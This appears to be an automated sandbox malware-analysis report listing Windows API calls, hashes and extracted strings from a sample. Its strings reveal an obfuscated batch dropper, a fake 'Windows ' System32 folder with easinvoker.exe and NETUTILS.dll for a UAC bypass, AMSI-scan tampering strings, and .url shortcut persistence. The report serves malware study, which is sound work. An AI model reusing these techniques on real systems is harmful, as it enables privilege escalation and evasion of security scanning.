                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                     • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                    • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                    • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                    • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3764614163-0
                                                                                                                                                                                    • Opcode ID: 063d9ce804bbd93d0b6528190e2cb861a5a3bdc4585bf4bd5232729cd7b2edbd
                                                                                                                                                                                    • Instruction ID: c361c60010d3a33a92901888b87327eee9e1741af910a2b6cf7465e2306a588d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 063d9ce804bbd93d0b6528190e2cb861a5a3bdc4585bf4bd5232729cd7b2edbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D212175A61318BAEB10EBA4CD42FEEB7BCEB04B00F6044A1B610FB1C0D7F06E448654
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03234EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 03234EF2
                                                                                                                                                                                    • RtlInitUnicodeString.N(?,?,00000000,0324C3E2), ref: 0324C390
                                                                                                                                                                                    • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3A6
                                                                                                                                                                                    • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3C5
                                                                                                                                                                                      • Part of subcall function 03234C24: SysFreeString.OLEAUT32(0324D42C), ref: 03234C32
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1694942484-0
                                                                                                                                                                                    • Opcode ID: 5307c68e1b3688f1344206279d00ba80d1aaccafd377184db5cb19e6157ed970
                                                                                                                                                                                    • Instruction ID: ca49ca95d9f18478366f7e0c6e35401111e1d3a47e3434d61e4135be822ee4b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5307c68e1b3688f1344206279d00ba80d1aaccafd377184db5cb19e6157ed970
                                                                                                                                                                                    • Instruction Fuzzy Hash: 54014475961308BEDB04EBA4CC81FCDB7FCEB48700F5044A1A600EA580FBB4AB448664
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03246D28: CLSIDFromProgID.OLE32(00000000), ref: 03246D55
                                                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,03246E68,00000000), ref: 03246DD3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFromInstanceProg
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2151042543-0
                                                                                                                                                                                    • Opcode ID: 154e0e282f29362344a5feb2b0e7a042f1d8d32a8267fa0e047c658bbcfc755e
                                                                                                                                                                                    • Instruction ID: 27403853c49ae17da5100f0ecc7a33afc03422eb372745aaca61e9cf7c0297e4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 154e0e282f29362344a5feb2b0e7a042f1d8d32a8267fa0e047c658bbcfc755e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A01A775724704AFD709DFA1DC12D6F7BECD74BB10F910475F500E6A40E6B05950C5A4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

call 3247be8 8013->8096 8105 3254767-32547c4 call 3234824 call 3234964 call 3234d38 call 3234da4 call 3234728 8091->8105 8109 32549c5-3254a30 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8096->8109 8169 32547c9-32547d0 call 324c3f8 8105->8169 8179 3254a35-3254a3c call 3247be8 8109->8179 8125 3256a4f-3256aba call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8113->8125 8193 3256abf-3256ac6 call 3247be8 8125->8193 8169->7716 8189 3254a41-3254aac call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8179->8189 8235 3254ab1-3254ab8 call 3247be8 8189->8235 8203 3256acb-3256b36 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8193->8203 8242 3256b3b-3256b4f call 3247be8 EnumSystemLocalesA 8203->8242 8241 3254abd-3254b28 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8235->8241 8268 3254b2d-3254b34 call 3247be8 8241->8268 8242->7086 8272 3254b39-3254bc3 call 3233694 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8268->8272 8300 3254bc8-3254bcf call 3247be8 8272->8300 8304 3254bd4-3254cbc call 3234824 call 3232f08 call 323794c call 32347b0 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8300->8304 8353 3254cc1-3254cc8 call 3247be8 8304->8353 8357 3254ccd-3254d38 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8353->8357 8381 3254d3d-3254d44 call 3247be8 8357->8381 8385 3254d49-3254df0 call 3232f08 call 323794c call 32347b0 call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8381->8385 8424 3254df5-3254dfc call 3247be8 8385->8424 8428 3254e01-3254e6c call 3234824 call 3234964 call 3234698 call 32347b0 call 3234964 call 3234698 8424->8428 8452 3254e71-3254e78 call 3247be8 8428->8452 8456 3254e7d-3254eca call 3234824 call 3234964 call 3234698 8452->8456 8468 3254ecf-3254edc call 3244d90 8456->8468 8471 3254edf-3254ef6 
call 32336c4 8468->8471
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 0324C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0324C4CA), ref: 0324C437
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0324C471
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0324C49E
                                                                                                                                                                                      • Part of subcall function 0324C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0324C4A7
                                                                                                                                                                                      • Part of subcall function 03237E18: GetFileAttributesA.KERNEL32(00000000,?,0324E0EE,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanString,03295344,03258FEC,UacScan,03295344,03258FEC,UacInitialize), ref: 03237E23
                                                                                                                                                                                    • Sleep.KERNEL32(00001770,UacScan,03295344,03258FEC,ScanString,03295344,03258FEC,OpenSession,03295344,03258FEC,ScanBuffer,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03253094
                                                                                                                                                                                      • Part of subcall function 0324C368: RtlInitUnicodeString.N(?,?,00000000,0324C3E2), ref: 0324C390
                                                                                                                                                                                      • Part of subcall function 0324C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3A6
                                                                                                                                                                                      • Part of subcall function 0324C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0324C3E2), ref: 0324C3C5
                                                                                                                                                                                    • WinExec.KERNEL32 ref: 0325436D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                                                                                    • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                                                                                                                    • API String ID: 102611719-2667577771
                                                                                                                                                                                    • Opcode ID: 9046e6aa81d80296df0a4330e8c7ebe00f51d25cfb0ad09897ceb6be4cb312e2
                                                                                                                                                                                    • Instruction ID: 43d4c4fe17c08a13d85aeab03278cea8db493889300bdc33209a09facae346a4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9046e6aa81d80296df0a4330e8c7ebe00f51d25cfb0ad09897ceb6be4cb312e2
                                                                                                                                                                                    • Instruction Fuzzy Hash: D153FA79B64359CFDB10FB65DC80E9D73B5AB8A214F5081E2A408EB654DBB0AEC1CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 03247BE8: LoadLibraryW.KERNEL32(?,00000000,03247C9A), ref: 03247C18
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetModuleHandleW.KERNEL32(?,?,00000000,03247C9A), ref: 03247C1E
                                                                                                                                                                                      • Part of subcall function 03247BE8: GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,03247C9A), ref: 03247C37
                                                                                                                                                                                      • Part of subcall function 0324D318: RegOpenKeyA.ADVAPI32(?,00000000,03295798), ref: 0324D35C
                                                                                                                                                                                      • Part of subcall function 0324D318: RegSetValueExA.ADVAPI32(00000510,00000000,00000000,00000001,00000000,0000001C), ref: 0324D394
                                                                                                                                                                                      • Part of subcall function 0324D318: RegCloseKey.ADVAPI32(00000510), ref: 0324D39F
                                                                                                                                                                                    • WinExec.KERNEL32 ref: 032557F9
                                                                                                                                                                                      • Part of subcall function 03249E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 03249F33
                                                                                                                                                                                    • RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,03295344,03258FEC,UacScan,03295344,03258FEC,OpenSession,03295344,03258FEC,OpenSession,03295344,03258FEC), ref: 03255D7B
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                                                                                    • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                                                                    • API String ID: 897696978-872072817
                                                                                                                                                                                    • Opcode ID: 809b9e96fa0e3c4351f23545bec2960a43143ac809834ba94826259c414d7509
                                                                                                                                                                                    • Instruction ID: 9e3ac1b8abfd2e23cc46ae9d13cf52d99a8a9b3f7fd558d5d95f0dab6a2e4dde
                                                                                                                                                                                    • Opcode Fuzzy Hash: 809b9e96fa0e3c4351f23545bec2960a43143ac809834ba94826259c414d7509
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA92EB79B24399CFCB14FB65D8809DD73B6AB4A704F5080E2A548EB654DBB0AEC1CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
[Control-flow graph data omitted; named API call in the graph: GetLongPathNameW]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
• Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LongNamePath
                                                                                                                                                                                    • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                    • API String ID: 82841172-425784914
                                                                                                                                                                                    • Opcode ID: eed1c3f6249b270c98b747fcff48a4c7d97f16700ff56c5249f16aefc2506912
                                                                                                                                                                                    • Instruction ID: f4f35dcd16d60dad3bc82940c2f51355144f9f919572a7aaa00648fb5da1cc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: eed1c3f6249b270c98b747fcff48a4c7d97f16700ff56c5249f16aefc2506912
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1641207B2082529BC314DE64EC50CAFBBA9AED5251F100D2EB545960A0FF60BE4DCB62
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
[Control-flow graph data omitted; named API calls in the graph: MultiByteToWideChar, WideCharToMultiByte]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,15CDEA24,15CDEA24,?,?,?,15CEAE9A,00000001,00000001,73E85006), ref: 15CEACA3
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,15CEAE9A,00000001,00000001,73E85006,?,?,?), ref: 15CEAD29
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 15CEAE23
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE30
                                                                                                                                                                                      • Part of subcall function 15CE6137: HeapAlloc.KERNEL32(00000000,15CD52BC,?,?,15CD8847,?,?,00000000,15D16B50,?,15CADE62,15CD52BC,?,?,?,?), ref: 15CE6169
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE39
                                                                                                                                                                                    • __freea.LIBCMT ref: 15CEAE5E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.376863459.0000000015CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 15CA0000, based on PE: true
• Associated: 00000005.00000002.376863459.0000000015D14000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000005.00000002.376863459.0000000015D18000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_15ca0000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3147120248-0
                                                                                                                                                                                    • Opcode ID: 4f58f9f576f745a197e7bfaa09a21517f6d2a6d0b1096b67f44d0728677692ff
                                                                                                                                                                                    • Instruction ID: 2d269905bd93290eedbb50227aef9d37cd364173dbf191104c8e522f2b4503e6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f58f9f576f745a197e7bfaa09a21517f6d2a6d0b1096b67f44d0728677692ff
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7751D673710216AFDB158F78CC88EAB7FAAEB44750F114A69FD05D7140EBB4EC5486A0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
[Control-flow graph data omitted; named API calls in the graph: VirtualAlloc, Sleep]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 032317D0
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000), ref: 032317E6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
• Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 9ec5aecef1ccce6ba08b435a83687264f093c3f87781b465b5fc2d7b353e692c
                                                                                                                                                                                    • Instruction ID: 6058aa367e2eaf4aefd6e0f5fc4001c44d7fe619b7b08571f8ad3d9ac5a3f787
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ec5aecef1ccce6ba08b435a83687264f093c3f87781b465b5fc2d7b353e692c
                                                                                                                                                                                    • Instruction Fuzzy Hash: FFB136B66203519BDB15EF28EC88395FBE0EB86310F1CC6AED4459F389D770A4A1C790
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B61
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B67
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,03247BA5,?,?,00000000,00000000), ref: 03247B81
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
• Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                    • String ID: irtualProtect$kernel32
                                                                                                                                                                                    • API String ID: 2099061454-2063912171
                                                                                                                                                                                    • Opcode ID: d17b6581f444c1e40883b19b9f5451410a35e2ff41685483d35e593aef19682e
                                                                                                                                                                                    • Instruction ID: 4d179a82a603ddafe3c3d6f043d03455e8f322e55f732eaf8c894e3ba7499104
                                                                                                                                                                                    • Opcode Fuzzy Hash: d17b6581f444c1e40883b19b9f5451410a35e2ff41685483d35e593aef19682e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 100171B8210348BFD705FFA8DC41E5EB7ECEB4A710F604451F524E7640C774AA818A24
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
[Control-flow graph data omitted; named API calls in the graph: Sleep, VirtualFree]
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,03231FE4), ref: 03231B17
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,03231FE4), ref: 03231B31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3472027048-0
                                                                                                                                                                                    • Opcode ID: 22f6d565f474199912b0614384e4215dabc60ece08a3cd1fdb64ade07f46d4d0
                                                                                                                                                                                    • Instruction ID: 5fe7f360789defb18c5098973fd1843d5e1dbea284d7179065f0bb5a3e595d6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 22f6d565f474199912b0614384e4215dabc60ece08a3cd1fdb64ade07f46d4d0
                                                                                                                                                                                    • Instruction Fuzzy Hash: B15121B16203418FE715EF68D984766BBE4AF47310F1885AED404CF28AE7B0E495C791
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0324C9EA
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, Offset: 03230000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.374217276.0000000003230000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    • Associated: 00000005.00000002.374296262.000000000325B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_3230000_hjc.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                                                                                    • Opcode ID: 8de112ffce6f3d9bdbc98ab4fc3aba5c301b783ba3c672db53e107d3ab14e0f7
                                                                                                                                                                                    • Instruction ID: defffb12cc0588fc6563370b71ee999817009f1dc8a2154e29db1321cd077fe7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8de112ffce6f3d9bdbc98ab4fc3aba5c301b783ba3c672db53e107d3ab14e0f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46415279B30368AFDB04FFA9D840EDEB3F5EF49600F204462E450BB645DAB4AD818B50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
